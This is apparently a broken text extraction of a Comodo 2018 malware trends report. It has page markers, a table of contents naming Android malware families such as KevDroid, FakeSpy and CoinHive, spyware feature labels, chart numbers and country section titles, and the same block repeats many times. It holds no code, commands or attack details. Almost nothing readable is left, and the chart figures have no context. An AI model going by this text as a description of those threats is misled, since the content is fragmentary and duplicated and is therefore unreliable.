BadShell at work


of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 18 of 73



of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 19 of 73










of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 20 of 73







of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 21 of 73





of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 22 of 73




The CoinHive script



of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 23 of 73










of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 24 of 73











of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 25 of 73





of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 26 of 73





The digital spooks


of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 27 of 73





Version-3

PU








of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 28 of 73



Version-2 Settings




of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 29 of 73











Upload image files






of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


